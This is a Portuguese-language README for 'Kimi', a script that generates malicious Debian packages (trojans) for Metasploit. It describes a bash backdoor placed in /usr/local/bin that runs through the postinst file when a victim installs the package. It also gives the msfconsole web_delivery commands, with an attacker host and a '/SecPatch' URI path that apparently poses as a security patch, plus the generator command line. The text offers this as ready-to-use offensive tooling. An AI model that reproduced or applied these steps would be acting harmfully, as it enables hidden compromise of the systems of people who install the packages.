Script para gerar pacotes debian maliciosos (deban trojans).
Kimi é um nome inspirado em “Kimimaro”, um dos meus favoritos da anime chamado “Naruto”.
Kimi é um script que gera o pacote malicious debian para metasploitque consiste em arquivo bash. o arquivo bash é implementado no diretório “/ usr / local / bin /”.
O Backdoor é executado apenas quando a vítima tenta instalar o pacote deb devido ao arquivo postinst
O arquivo Bash injeta e também age como um comando do sistema que, quando executado pela vítima e o atacante bate com a sessão.
Mais pontos:
- Totalmente independente. Significa usuário não precisa instalar nenhum criador do pacote debian
- Pode ser integrado com qualquer gerador de payload facilmente devido a compromissos de arguemt (coxo: P eu sei)
Kimi basicamente depende do módulo web_delivery e tudo é automatizado. todas as necessidades do atacante são fazer as seguintes configurações:
Configurando o Web_Delivery no msf:
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploitGerando carga maliciosa:
dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0NOTA :: Este projeto foi feito para ser integrado ao Venom Shellcode Generator 1.0.13.
Pode ser usado de forma independente também todas as necessidades do usuário é alterar o uripath em variáveis msf
Testado em:
- Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
- ParrotOS (Debian Jessie)
- Kali Rolling 2.0
Atualizações :::
-- Added "postinst" file creation function to make embeded malicious file execution automated
-- Added RC file generation function to fully automate with handler opening, means no need to
set handler manually
-- Patched some common bugs [special thanks to r00t 3xp10it :)]